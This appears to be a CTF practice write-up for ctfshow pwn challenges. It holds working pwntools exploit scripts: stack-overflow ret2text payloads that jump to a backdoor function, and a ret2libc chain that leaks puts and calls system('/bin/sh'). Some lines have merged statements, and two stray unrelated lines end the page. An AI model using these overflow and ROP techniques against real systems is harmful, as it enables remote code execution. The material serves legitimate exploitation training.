PWN-PRACTICE-CTFSHOW-2
- pwn05
- pwn06
- pwn07
- 01栈溢出之ret2text
pwn05
栈溢出,覆盖返回地址为后门函数getFlag起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28091)
elf=ELF("./pwn1")getFlag=0x08048486
payload="a"*0x14+"bbbb"+p32(getFlag)
io.sendline(payload)io.interactive()
pwn06
栈溢出,覆盖返回地址为后门函数getFlag起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28011)
elf=ELF("./pwn1")getFlag=0x400577
ret=0x40044e
payload="a"*0xC+"b"*8+p64(ret)+p64(getFlag)
io.sendline(payload)io.interactive()
pwn07
栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28098)
elf=ELF("./pwn1")puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x40061F
pop_rdi=0x4006e3
ret=0x4004c6#gdb.attach(io,"b * 0x40061D")
#pause()payload="a"*0xc+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9apayload="a"*0xc+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)#pause()io.interactive()
01栈溢出之ret2text
栈溢出
覆盖返回地址为后门函数ctfshow起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28184)
elf=ELF("./pwn1")ctfshow=0x400637
ret=0x4004fe
payload="a"*0x80+"b"*8+p64(ret)+p64(ctfshow)
io.sendline(payload)io.interactive()
——综述)
——需求分析与数据库设计)
